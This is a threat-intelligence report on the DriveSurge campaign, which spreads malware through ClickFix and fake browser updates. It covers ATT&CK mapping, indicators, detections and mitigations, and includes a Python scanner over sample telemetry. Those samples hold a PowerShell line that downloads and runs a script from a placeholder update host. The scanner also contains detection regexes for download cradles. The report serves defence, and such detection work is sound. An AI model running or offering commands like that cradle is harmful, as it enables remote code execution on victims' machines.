Full Report
A threat actor tracked as DriveSurge has been operating large-scale malware distribution campaigns using ClickFix and FakeUpdates techniques on compromised sites. [...]
Analysis Summary
# Tool/Technique: DriveSurge (ClickFix & FakeUpdates)
## Overview
DriveSurge is a large-scale malware distribution campaign operated by a threat actor functioning primarily as an Initial Access Broker (IAB). The campaign runs on a Pay-Per-Install (PPI) model, leveraging compromised high-reputation websites to deliver malware via the social engineering tactics known as **ClickFix** and **FakeUpdates**. The operation uses a Traffic Distribution System (TDS) to profile visitors and serve platform-specific malicious payloads.
## Technical Details
- **Type**: Malware Distribution Campaign / Infrastructure
- **Platform**: Windows, macOS
- **Capabilities**: Profiling (via TDS), Social Engineering, Clipboard Hijacking, Remote Code Execution (via manual command execution).
- **First Seen**: September 2025 (Active through 2026)
## MITRE ATT&CK Mapping
- **TA0001 - Initial Access**
  - T1189 - Drive-by Compromise
- **TA0002 - Execution**
  - T1059.001 - Command and Scripting Interpreter: PowerShell
  - T1204.001 - User Execution: Malicious Link
  - T1204.002 - User Execution: Malicious File
- **TA0005 - Defense Evasion**
  - T1027 - Obfuscated Files or Information
- **TA0007 - Discovery**
  - T1082 - System Information Discovery (via zTDS profiling)
## Functionality
### Core Capabilities
- **zTDS (Traffic Distribution System)**: Uses an open-source TDS to filter web traffic, profile visitor environments (browser, OS), and redirect them to specific malware-delivery infrastructure.
- **FakeUpdates (SocGholish-style)**: Displays fraudulent browser update notifications (Chrome, Firefox, Safari, etc.) to trick users into downloading a malicious ZIP archive containing executables and DLLs.
- **ClickFix**: A social engineering technique where a website "error" is shown, instructing the user to copy/paste a malicious PowerShell command into their terminal to "fix" the issue.
### Advanced Features
- **Cross-Platform Targeting**: Specifically designed obfuscated JavaScript payloads to target macOS users.
- **Clipboard Hijacking**: Used in ClickFix attacks to place the malicious command directly into the user's clipboard, so that it is pasted verbatim when the user follows the on-screen "fix" instructions.
- **High-Reputation Hijacking**: Injects malicious scripts into thousands of legitimate websites to bypass domain reputation filters.
## Indicators of Compromise
- **File Names**:
  - `Browser Update.exe`
  - `t.js` (Script injector)
- **Network Indicators**:
  - `t.js?site=[unique_id]` (Injection pattern)
- **Domains**:
  - Over 80 identified malicious injection domains (Note: Specific domains defanged as per protocol, e.g., `example[.]com/t.js`).
- **Behavioral Indicators**:
  - Redirects from legitimate sites to unfamiliar "update" or "verification" landing pages.
  - Unexpected PowerShell or Terminal execution prompts following web browsing.
## Associated Threat Actors
- **DriveSurge** (Primary operator and Initial Access Broker).
## Detection Methods
- **Signature-based detection**: Scan for the specific JavaScript injection pattern `t.js?site=`.
- **Behavioral detection**:
  - Monitor for PowerShell processes launched with command-line arguments containing encoded strings or network download cmdlets (e.g., `IEX`, `Invoke-WebRequest`).
  - Detect unauthorized modifications to the system clipboard originating from browser processes.
- **Network Monitoring**: Identify traffic to known zTDS redirection nodes or to recently registered domains mimicking browser update centers.
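The signature and behavioral detections above, combined into a small scanner over constructed telemetry; this is an added example, not part of the report, and the hostnames, event layout and rule names are assumptions made for illustration.

```python
import re

# Injection pattern from the report: the t.js injector loaded with a per-site id.
INJECTOR_RE = re.compile(r"/t\.js\?site=[A-Za-z0-9_-]+", re.I)

# PowerShell command-line traits the report names for ClickFix: in-memory
# execution (IEX), download cmdlets, and long encoded-command arguments.
PS_RULES = {
    "ps_inmemory_exec": re.compile(r"\b(iex|invoke-expression)\b", re.I),
    "ps_download_cradle": re.compile(
        r"\b(invoke-webrequest|iwr|invoke-restmethod|irm|downloadstring)\b", re.I),
    "ps_encoded_command": re.compile(
        r"(?:^|\s)-e(?:c|n|nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{20,}", re.I),
}
POWERSHELL_IMAGES = {"powershell.exe", "pwsh.exe"}

def check_proxy(event: dict) -> list[str]:
    """Flag web-proxy records that fetch the t.js injector pattern."""
    return ["tjs_injector_fetch"] if INJECTOR_RE.search(event["url"]) else []

def check_process(event: dict) -> list[str]:
    """Flag PowerShell process creations whose command line carries ClickFix traits."""
    if event["image"].lower() not in POWERSHELL_IMAGES:
        return []
    return [name for name, rx in PS_RULES.items() if rx.search(event["cmdline"])]

def scan_events(events: list[dict]) -> list[tuple[int, str]]:
    """Run both detections over a mixed stream; returns (event id, rule) pairs."""
    alerts = []
    for ev in events:
        hits = check_proxy(ev) if ev["type"] == "proxy" else check_process(ev)
        alerts.extend((ev["id"], rule) for rule in hits)
    return alerts

# Constructed sample telemetry for this example; hostnames are placeholders.
SAMPLE_EVENTS = [
    {"id": 1, "type": "proxy", "url": "https://news-site.example/wp-content/theme.css"},
    {"id": 2, "type": "proxy", "url": "https://cdn-assets.example/t.js?site=a1b2c3d4"},
    {"id": 3, "type": "process", "image": "powershell.exe",
     "cmdline": 'powershell -w hidden -c "iex (iwr https://update-center.example/u.ps1)"'},
    {"id": 4, "type": "process", "image": "powershell.exe",
     "cmdline": "powershell -NoProfile -enc QUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFB"},
    {"id": 5, "type": "process", "image": "powershell.exe",
     "cmdline": r"powershell -ExecutionPolicy Bypass -File C:\Scripts\inventory.ps1"},
]

if __name__ == "__main__":
    for event_id, rule in scan_events(SAMPLE_EVENTS):
        print(f"event {event_id}: {rule}")
```

Event 5 (a script run from disk by path) produces no alert, which is the point of keying on download cradles and encoded arguments rather than on PowerShell execution alone.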
## Mitigation Strategies
- **User Training**: Educate users never to copy/paste commands from a website into a terminal or command prompt.
- **Update Policy**: Enforce software updates only through official application settings (e.g., `About > Check for Updates`) or centralized management tools.
- **Browser Security**: Use ad-blockers and script-blocking extensions to prevent the execution of unauthorized JavaScript.
- **Endpoint Protection**: Deploy EDR solutions to block suspicious PowerShell execution and file downloads from unverified sources.
## Related Tools/Techniques
- **SocGholish (FakeUpdates)**: A similar campaign known for using fake browser updates to deliver RATs.
- **ClearFake**: Another campaign focused on fraudulent browser update overlays.
- **zTDS**: The open-source traffic distribution system used for redirection.